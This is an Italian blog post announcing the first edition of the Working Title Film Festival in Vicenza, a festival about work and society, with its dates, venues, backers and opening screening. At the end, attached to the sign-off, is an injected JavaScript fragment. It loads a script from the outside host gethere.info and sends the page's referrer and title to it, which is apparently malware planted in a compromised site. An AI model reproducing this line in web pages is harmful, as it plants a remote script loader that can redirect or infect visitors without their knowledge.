Working Title Film Festival a Vicenza-Parte la prima edizione

Dal 27 aprile al 1 maggio Vicenza si animerà di cinema con il Working Title Film Festival. Cinque giorni di proiezioni ed eventi sparsi per la città che daranno vita alla prima edizione di questo festival molto particolare. Il tema centrale del WTFF è infatti il lavoro e tutti gli aspetti sociali ad esso legati e offre un calendario di proiezioni diversificato, con film e cortometraggi, e ricco di eventi collaterali.

Il festival è promosso da LIES- laboratorio dell’inchiesta economica e sociale, dal Cinema Primavera, dove si terranno le proiezioni e dall’ex spazio industriale Exworks, oggi luogo di lavoro per professionisti di arti visive e si sostiene anche attraverso un progetto di crowdfunding su Eppela.

Già dal 22 aprile è possibile visitare nello spazio Exworks la mostra fotografica Tempo è lavoro, evento collaterale del festival. La prima proiezione è invece prevista per domani, mercoledì 27 aprile, alle 16:30 al Cinema Primavera, il film inaugurale sarà  La legge del mercato di Stéphane Brizé a verrà riproposto alle 19:00.

Per maggiori info e per il programma dettagliato del festival vi rimandiamo alla pagina ufficiale dell’evento! Dateci un’occhiata, ce n’è per tutti i gusti!

Noi FEMS, dal canto nostro, terremo d’occhio l’iniziativa molto da vicino. Buone visioni ;)s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Share This: